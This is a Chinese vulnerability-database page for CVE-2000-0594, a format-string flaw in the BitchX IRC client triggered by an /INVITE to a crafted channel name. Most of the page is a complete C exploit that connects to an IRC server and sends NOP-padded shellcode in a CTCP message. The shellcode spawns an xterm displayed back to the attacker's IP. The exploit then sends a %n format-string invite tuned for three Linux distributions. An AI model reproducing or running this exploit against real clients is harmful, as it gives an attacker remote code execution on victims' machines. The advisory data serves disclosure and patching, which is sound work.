CVE-2000-0594
CVSS5.0
发布时间 :2000-07-04 00:00:00
修订时间 :2008-09-10 15:05:10
NMCOE    

[原文]BitchX IRC client does not properly cleanse an untrusted format string, which allows remote attackers to cause a denial of service via an invite to a channel whose name includes special formatting characters.


[CNNVD]BitchX IRC客户端"/INVITE"格式字符串漏洞(CNNVD-200007-004)

        BitchX IRC客户端不能正确净化不可信格式字符串,远程攻击者可以借助对名称中含特殊格式字符的信道的邀请来导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:caldera:openlinux_eserver:2.3
cpe:/o:caldera:openlinux_edesktop:2.4
cpe:/o:mandrakesoft:mandrake_linux:2007MandrakeSoft Mandrake Linux 2007.0
cpe:/o:freebsd:freebsd:3.5FreeBSD 3.5
cpe:/a:caldera:openlinux_desktop:2.3
cpe:/a:caldera:openlinux_ebuilder:2.3
cpe:/o:freebsd:freebsd:4.0FreeBSD 4.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0594
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0594
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200007-004
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/4897.php
(VENDOR_ADVISORY)  XF  irc-bitchx-invite-dos
http://www.securityfocus.com/bid/1436
(UNKNOWN)  BID  1436
http://www.redhat.com/support/errata/RHSA-2000-042.html
(UNKNOWN)  REDHAT  RHSA-2000:042
http://www.calderasystems.com/support/security/advisories/CSSA-2000-022.0.txt
(UNKNOWN)  CALDERA  CSSA-2000-022.0
http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0018.html
(UNKNOWN)  VULN-DEV  20000704 BitchX /ignore bug
http://archives.neohapsis.com/archives/freebsd/2000-07/0042.html
(UNKNOWN)  FREEBSD  FreeBSD-SA-00:32
http://archives.neohapsis.com/archives/bugtraq/2000-07/0105.html
(UNKNOWN)  BUGTRAQ  20000707 BitchX update
http://archives.neohapsis.com/archives/bugtraq/2000-07/0098.html
(UNKNOWN)  BUGTRAQ  20000707 CONECTIVA LINUX SECURITY ANNOUNCEMENT - BitchX
http://archives.neohapsis.com/archives/bugtraq/2000-07/0026.html
(UNKNOWN)  BUGTRAQ  20000704 BitchX exploit possibly waiting to happen, certain DoS

- 漏洞信息

BitchX IRC客户端"/INVITE"格式字符串漏洞
中危 格式化字符串
2000-07-04 00:00:00 2006-09-05 00:00:00
远程  
        BitchX IRC客户端不能正确净化不可信格式字符串,远程攻击者可以借助对名称中含特殊格式字符的信道的邀请来导致服务拒绝。

- 公告与补丁

        Use the supplied patches or upgrade to a patched version. See the advisories under the "Credit" tab for vendor-specific packages.
        BitchX IRC Client 75p3
        
        BitchX IRC Client 1.0 c16
        

- 漏洞信息 (20060)

BitchX IRC Client 75p1/75p3/1.0 c16 "/INVITE" Format String Vulnerability (EDBID:20060)
linux remote
2000-07-05 Verified
0 RaiSe
N/A [点击下载]
source: http://www.securityfocus.com/bid/1436/info

BitchX IRC clients, versions 75 up to and including 1.0c16, are vulnerable to a Denial of Service and possible remote execution of code. By /invite-ing someone to a channel name containing formatting characters (%s, %n, etc) an IRC user can cause the targetted user's BitchX client to seg-fault. This is caused by the fact that bitchx passes the channel name from the invite into the logging function as its format string [which is used directly in a vsprintf], rather than as an argument to the format. This also affects the KILL command. 

/*
 *  BitchX Xploit by RaiSe
 *  Tested with version 1.0c16(+) in:        redhat 6.0 (2.2.16)
 *                                           redhat 7.0 (2.2.16)
 *                                           debian 2.2 (2.2.16)
 *
 *  NetSearch Ezine Staff
 *  http://www.netsearch-ezine.com
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netdb.h>

#define PORT 6667

int soc_local,snick;
struct sockaddr_in addr_local;
struct hostent *server;
char buf[1024], cmd[512], formatbuf[1024], ip[64], *p;

int irc(char *n,char *s,char *sc);
int format(int v);

static char shellcode[256] =    // by RaiSe
"\xeb\x5b\x5e\x31\xc0\xb0\x02\x31\xdb\xcd\x80\x39\xc3\x75\x47\x31"
"\xd2\x88\x56\x14\x88\x56\x18\x88\x56\x21\xb2\x2b\x31\xc9\xb1\x09"
"\x80\x3c\x32\x4b\x74\x05\x42\xe2\xf7\xeb\x2b\x88\x34\x32\x31\xd2"
"\x89\xf3\x89\x76\x36\x8d\x7e\x15\x89\x7e\x3a\x8d\x7e\x19\x89\x7e"
"\x3e\x8d\x7e\x22\x89\x7e\x42\x89\x56\x46\x8d\x4e\x36\x8d\x56\x46"
"\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xa0\xff"
"\xff\xff/usr/X11R6/bin/xterm8-ut8-display8";

char nops4[] = "\x90\x90\x90\x90";


// main()
int main(int argc, char *argv[])
{

        if (argc!=5)
        {       
                printf("\nBitchX Xploit by RaiSe\n");
                printf("http://www.netsearch-ezine.com\n");
                printf("\nuse: %s nick irc-server my-ip dist\n",argv[0]);
                printf("\ndist = 1 --> redhat 6.0\n"
                                "dist = 2 --> redhat 7.0\n"
                                "dist = 3 --> debian 2.2\n\n");
                exit(0);
        }

        sprintf(ip,"%s:0K",argv[3]);
        strcat(shellcode,ip);

        printf("\nBitchX Xploit by RaiSe\n");
        printf("http://www.netsearch-ezine.com\n");
        puts("\ndoing it..");

        snick=strlen(argv[1]);
        format(atoi(argv[4]));
        irc (argv[1],argv[2],formatbuf);
        printf("finished\n\n");

        return(0);

} // end main()

// irc()
int irc(char *n,char *s,char *sc)
{

        if ((server = gethostbyname(s)) == 0) 
        {
                printf("error al resolver el host\n");
                exit(0);
        }

        if ((soc_local=socket(AF_INET,SOCK_STREAM,0)) == -1)
        {
                printf("error al crear el socket\n");
                exit(0);
        }

        bzero((char *) &addr_local, sizeof(addr_local));

        addr_local.sin_family = AF_INET;
        addr_local.sin_port = htons(PORT);
        memcpy(&addr_local.sin_addr, server->h_addr, server->h_length);

        if ((connect(soc_local,(struct sockaddr *) &addr_local,sizeof(addr_local)))
                        == -1)
        {
                printf("error al conectar con el servidor\n");
                exit(0);
        }

        p=buf;

        // user
        sprintf(cmd,"user k k k k\n");
        write(soc_local,cmd,strlen(cmd));

        // nick
        sprintf(cmd,"nick rxkfe\n");
        write(soc_local,cmd,strlen(cmd));

        // pong
        while(1)
        {
                read(soc_local,p,1);
                if ((*p=='\n') && (strstr(buf,"PING :")))
                {
                        p = (strstr(buf,"PING :")) + strlen("PING :");
                        sprintf(cmd,"PONG %s",p);
                        write(soc_local,cmd,strlen(cmd));
                        break;
                }
                if (*p=='\n')
                        p=buf;
                p++;
        } 

        // ctcp
        sprintf(cmd,"privmsg %s :\x01%s%s%s%s%s%s\x01\n"
                        ,n,nops4,nops4,nops4,nops4,nops4,shellcode);

        write(soc_local,cmd,strlen(cmd));

        sleep(2);

        // invite
        sprintf(cmd,"invite %s #%s\n",n,sc);
        write(soc_local,cmd,strlen(cmd));

        sleep(2);
        return(0);

} // end irc()

// format()
int format(int v)
{

        if ((v!=1) && (v!=2) && (v!=3))
        {
                printf("\ndist = 1 --> redhat 6.0\n"
                       "dist = 2 --> redhat 7.0\n"
                       "dist = 3 --> debian 2.2\n\n");
                printf("exiting..\n\n");
                exit(0);
        }


if (v==1)
{
int n, nr, a1, nx, nn = 0x150;
char dire[4][8] = { "\x60","\x61","\x62","\x63" };
int a2 = 0x1b5 - 0xdb;
int a3 = 0xff - 0xb5;
int a4 = 0x1bf - 0xff;
char xx[1024], nops[256];

switch(snick)
{
case 1:
        sprintf(nops,"\x90%s",nops4);
        nx = 126;
        nr = 0x6;
        break;
case 2:
        sprintf(nops,"%s",nops4);
        nx = 126;
        nr = 0x5;
        break;
case 3:
        sprintf(nops,"\x90\x90\x90");
        nx = 126;
        nr = 0x4;
        break;
case 4:
        sprintf(nops,"\x90\x90");
        nx = 126;
        nr = 0x3;
        break;
case 5:
        sprintf(nops,"\x90");
        nx = 126;
        nr = 0x2;
        break;
case 6:
        sprintf(nops,"%s",nops4);
        nx = 129;
        nr = 0x5;
        nn = 0x158;
        break;
case 7:
        sprintf(nops,"\x90\x90\x90");
        nx = 129;
        nr = 0x4;
        nn = 0x158;
        break;
case 8:
        sprintf(nops,"\x90\x90");
        nx = 129;
        nr = 0x3;
        nn = 0x158;
        break;
case 9:
        sprintf(nops,"\x90");
        nx = 129;
        nr = 0x2;
        nn = 0x158;
}

a1 = 0x10db - nn - 0x10 - 0xc - nr;

  for (n = 0; n < nx ; n += 3)
    strcpy(&xx[n], "%8x");

  sprintf(formatbuf,
         "%s"
         "%s\xea\xff\xbf"
         "%s"
         "%s\xea\xff\xbf"
         "%s"
         "%s\xea\xff\xbf"
         "%s"
         "%s\xea\xff\xbf"
         "%s"
         "%%%dx%%n"
         "%%%dx%%n"
         "%%%dx%%n"
         "%%%dx%%n"
         ,nops,dire[0],nops4,dire[1],nops4,dire[2],
         nops4,dire[3],xx,a1,a2,a3,a4);
}

if (v==2)
{
int n, nr, a1, nx, nn = 0x138;
char dire[4][8] = { "\xbc","\xbd","\xbe","\xbf" };
int a2 = 0x1b2 - 0xc1;
int a3 = 0xff - 0xb2;
int a4 = 0x1bf - 0xff;
char xx[1024], nops[256];

switch(snick)
{
case 1:
        sprintf(nops,"\x90%s",nops4);
        nx = 117;
        nr = 0x6;
        strcpy(dire[0],"\xbc");
        strcpy(dire[1],"\xbd");
        strcpy(dire[2],"\xbe");
        strcpy(dire[3],"\xbf");
        break;
case 2:
        sprintf(nops,"%s",nops4);
        nx = 117;
        nr = 0x5;
        strcpy(dire[0],"\xbc");
        strcpy(dire[1],"\xbd");
        strcpy(dire[2],"\xbe");
        strcpy(dire[3],"\xbf");
        break;
case 3:
        sprintf(nops,"\x90\x90\x90");
        nx = 117;
        nr = 0x4;
        strcpy(dire[0],"\xbc");
        strcpy(dire[1],"\xbd");
        strcpy(dire[2],"\xbe");
        strcpy(dire[3],"\xbf");
        break;
case 4:
        sprintf(nops,"\x90\x90");
        nx = 117;
        nr = 0x3;
        strcpy(dire[0],"\xbc");
        strcpy(dire[1],"\xbd");
        strcpy(dire[2],"\xbe");
        strcpy(dire[3],"\xbf");
        break;
case 5:
        sprintf(nops,"\x90");
        nx = 117;
        nr = 0x2;
        break;
case 6:
        sprintf(nops,"%s",nops4);
        nx = 120;
        nr = 0x5;
        nn = 0x140;
        break;
case 7:
        sprintf(nops,"\x90\x90\x90");
        nx = 120;
        nr = 0x4;
        nn = 0x140;
        break;
case 8:
        sprintf(nops,"\x90\x90");
        nx = 120;
        nr = 0x3;
        nn = 0x140;
        break;
case 9:
        sprintf(nops,"\x90");
        nx = 120;
        nr = 0x2;
        nn = 0x140;
}

a1 = 0x10c1 - nn - 0x10 - 0xc - nr;

  for (n = 0; n < nx ; n += 3)
    strcpy(&xx[n], "%8x");

  sprintf(formatbuf,
         "%s"
         "%s\xe7\xff\xbf"
         "%s"
         "%s\xe7\xff\xbf"
         "%s"
         "%s\xe7\xff\xbf"
         "%s"
         "%s\xe7\xff\xbf"
         "%s"
         "%%%dx%%n"
         "%%%dx%%n"
         "%%%dx%%n"
         "%%%dx%%n"
         ,nops,dire[0],nops4,dire[1],nops4,dire[2],
         nops4,dire[3],xx,a1,a2,a3,a4);
}

if (v==3)
{
int n, nr, a1, nx, nn = 0x180;
char dire[4][8] = { "\x80","\x81","\x82","\x83" };
int a2 = 0x1b3 - 0xa4;
int a3 = 0xff - 0xb3;
int a4 = 0x1bf - 0xff;
char xx[1024], nops[256];

switch(snick)
{
case 1:
        sprintf(nops,"\x90%s",nops4);
        nx = 144;
        nr = 0x6;
        break;
case 2:
        sprintf(nops,"%s",nops4);
        nx = 144;
        nr = 0x5;
        break;
case 3:
        sprintf(nops,"\x90\x90\x90");
        nx = 144;
        nr = 0x4;
        break;
case 4:
        sprintf(nops,"\x90\x90");
        nx = 144;
        nr = 0x3;
        break;
case 5:
        sprintf(nops,"\x90");
        nx = 144;
        nr = 0x2;
        break;
case 6:
        sprintf(nops,"%s",nops4);
        nx = 147;
        nr = 0x5;
        nn = 0x188;
        break;
case 7:
        sprintf(nops,"\x90\x90\x90");
        nx = 147;
        nr = 0x4;
        nn = 0x188;
        break;
case 8:
        sprintf(nops,"\x90\x90");
        nx = 147;
        nr = 0x3;
        nn = 0x188;
        break;
case 9:
        sprintf(nops,"\x90");
        nx = 147;
        nr = 0x2;
        nn = 0x188;
        strcpy(dire[0],"\x70");
        strcpy(dire[1],"\x71");
        strcpy(dire[2],"\x72");
        strcpy(dire[3],"\x73");
}

a1 = 0x10a4 - nn - 0x10 - 0xc - nr;

  for (n = 0; n < nx ; n += 3)
    strcpy(&xx[n], "%8x");

  sprintf(formatbuf,
         "%s"
         "%s\xe8\xff\xbf"
         "%s"
         "%s\xe8\xff\xbf"
         "%s"
         "%s\xe8\xff\xbf"
         "%s"
         "%s\xe8\xff\xbf"
         "%s"
         "%%%dx%%n"
         "%%%dx%%n"
         "%%%dx%%n"
         "%%%dx%%n"
         ,nops,dire[0],nops4,dire[1],nops4,dire[2],
         nops4,dire[3],xx,a1,a2,a3,a4);
}

return(0);

} // end format()

// 0x00
		

- 漏洞信息

1445
BitchX IRC Client INVITE Format String DoS
Remote / Network Access Denial of Service
Loss of Integrity Third-Party Solution
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-07-05 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

  • Bugtraq ID: 1436
  • CVE ID: 2000-0594 (see also: NVD)
  • Exploit Database: 20060
  • ISS X-Force ID: 4897
  • Generic Informational URL: RHSA-2000:042-01

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站